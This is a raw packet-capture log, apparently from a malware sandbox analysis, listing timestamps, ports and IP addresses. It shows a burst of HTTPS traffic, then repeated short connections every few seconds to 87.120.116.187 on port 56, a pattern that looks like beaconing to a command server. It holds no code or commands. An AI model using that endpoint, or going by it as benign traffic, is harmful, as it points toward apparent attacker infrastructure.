Jan 10, 2025 23:50:10.131057024 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.131067038 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.131110907 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.131114006 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.131122112 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.131156921 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.131164074 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.131221056 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.136859894 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.136910915 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.136926889 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.136971951 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.136977911 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.137048006 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.137162924 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.137209892 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.137226105 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.137269020 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.137278080 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.137325048 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.142700911 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142749071 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.142755985 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142801046 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.142807961 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142843008 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142843962 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.142853975 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142888069 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.142894030 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.142939091 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.148417950 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.148478031 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.148484945 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.148526907 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.148530960 CET  49406  443    192.168.2.5     172.217.16.129
Jan 10, 2025 23:50:10.148538113 CET  443    49406  172.217.16.129  192.168.2.5
Jan 10, 2025 23:50:10.148569107 CET  49406  443    192.168.2.5     172.217.16.129
                                                                              Jan 10, 2025 23:50:10.148595095 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.148598909 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.148648024 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152046919 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152096987 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152190924 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152232885 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152239084 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152283907 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152354956 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152400017 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152426004 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152465105 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.152471066 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.152517080 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157711983 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.157762051 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157768011 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.157809973 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.157815933 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157823086 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.157850027 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157876968 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157881021 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.157922029 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.157982111 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.158032894 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.162883043 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.162925005 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.162931919 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.162972927 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.162976027 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.162983894 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.163007021 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.163039923 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.163109064 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.163146019 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.163153887 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.163197041 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168581963 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168627024 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168634892 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168680906 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168687105 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168726921 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168731928 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168775082 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168780088 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168821096 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.168826103 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.168868065 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.172998905 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173039913 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.173049927 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173094034 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.173100948 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173141003 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.173156023 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173196077 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.173202038 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173243046 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.173248053 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.173288107 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177462101 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177505970 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177510977 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177556038 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177556038 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177565098 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177588940 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177628994 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177676916 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177716970 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.177722931 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.177763939 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.181808949 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.181852102 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.181858063 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.181901932 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.181907892 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.181953907 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.181958914 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.181996107 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.182002068 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.182039976 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.182044029 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.182084084 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186012983 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186055899 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186062098 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186096907 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186103106 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186109066 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186130047 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186166048 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186242104 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186284065 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.186291933 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.186332941 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.190476894 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.190522909 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.190529108 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.190567017 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.190574884 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.190581083 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.190603018 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.190633059 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.190637112 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.190681934 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.196732044 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.196779966 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.196902990 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.196942091 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.196949005 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.196990967 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.196991920 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.197001934 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.197027922 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.197052002 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.197060108 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.197105885 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.197112083 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.197151899 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.207495928 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.207541943 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.207551003 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.207587957 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.207592010 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.207597971 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.207628012 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.207750082 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.207788944 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.213609934 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213689089 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213712931 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.213720083 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213756084 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213776112 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.213783979 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213872910 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.213913918 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.213973999 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219614983 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219666958 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219763041 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219763041 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219793081 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219841003 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219841957 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219854116 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219880104 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219913006 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.219932079 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.219980001 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225532055 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225577116 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225583076 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225621939 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225624084 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225634098 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225651979 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225681067 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225687027 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225724936 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.225802898 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.225841999 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.231492043 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231549025 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231549978 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.231558084 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231585026 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.231591940 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231625080 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.231631041 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231683969 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.231689930 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.231729031 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.236975908 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237025976 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.237035990 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237090111 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.237095118 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237131119 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237147093 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.237154007 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237166882 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.237205029 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.237582922 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:10.237624884 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:10.240730047 CET44349406172.217.16.129192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 10, 2025 23:50:10.240775108 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.240782022 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.240814924 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.240864038 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.240899086 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.240906000 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.240942955 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.240948915 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.240998030 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.241003990 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.241045952 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.246362925 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246404886 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.246412039 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246450901 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.246459007 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246501923 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.246690035 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246728897 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.246733904 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246742964 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.246779919 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251503944 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.251542091 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251549006 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.251584053 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251591921 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.251627922 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251633883 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.251677036 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251739025 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:10.251744986 CET  443          49406      172.217.16.129   192.168.2.5
Jan 10, 2025 23:50:10.251790047 CET  49406        443        192.168.2.5      172.217.16.129
Jan 10, 2025 23:50:13.185662985 CET  49440        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:13.190588951 CET  56           49440      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:13.190687895 CET  49440        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:13.191092014 CET  49440        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:13.195895910 CET  56           49440      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:14.823162079 CET  56           49440      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:14.823249102 CET  49440        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:14.823331118 CET  49440        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:14.828114986 CET  56           49440      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:15.828896046 CET  49457        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:15.833816051 CET  56           49457      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:15.833919048 CET  49457        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:15.834193945 CET  49457        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:15.839040995 CET  56           49457      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:17.464711905 CET  56           49457      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:17.464896917 CET  49457        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:17.464943886 CET  49457        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:17.470730066 CET  56           49457      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:18.469213009 CET  49473        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:18.474123955 CET  56           49473      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:18.474258900 CET  49473        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:18.474523067 CET  49473        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:18.479504108 CET  56           49473      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:20.124007940 CET  56           49473      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:20.124070883 CET  49473        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:20.124104977 CET  49473        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:20.128998041 CET  56           49473      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:21.125540972 CET  49492        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:21.130500078 CET  56           49492      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:21.130660057 CET  49492        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:21.130944014 CET  49492        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:21.135695934 CET  56           49492      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:22.763279915 CET  56           49492      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:22.764115095 CET  49492        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:22.764149904 CET  49492        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:22.769228935 CET  56           49492      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:23.766235113 CET  49508        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:23.771162987 CET  56           49508      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:23.771239996 CET  49508        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:23.771522999 CET  49508        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:23.776360035 CET  56           49508      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:25.401113987 CET  56           49508      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:25.401201010 CET  49508        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:25.401241064 CET  49508        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:25.406033039 CET  56           49508      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:26.406795979 CET  49528        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:26.411648989 CET  56           49528      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:26.411751986 CET  49528        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:26.412012100 CET  49528        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:26.416827917 CET  56           49528      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:28.045469999 CET  56           49528      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:28.045711994 CET  49528        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:28.045761108 CET  49528        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:28.050564051 CET  56           49528      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:29.047899008 CET  49545        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:29.052800894 CET  56           49545      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:29.052879095 CET  49545        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:29.053246975 CET  49545        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:29.058031082 CET  56           49545      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:30.665060997 CET  56           49545      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:30.665167093 CET  49545        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:30.665324926 CET  49545        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:30.670077085 CET  56           49545      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:31.672555923 CET  49561        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:31.677468061 CET  56           49561      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:31.677541018 CET  49561        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:31.681261063 CET  49561        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:31.687361002 CET  56           49561      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:33.309300900 CET  56           49561      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:33.311306000 CET  49561        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:33.311306000 CET  49561        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:33.316102982 CET  56           49561      87.120.116.187   192.168.2.5
Jan 10, 2025 23:50:34.339219093 CET  49582        56         192.168.2.5      87.120.116.187
Jan 10, 2025 23:50:34.344034910 CET  56           49582      87.120.116.187   192.168.2.5
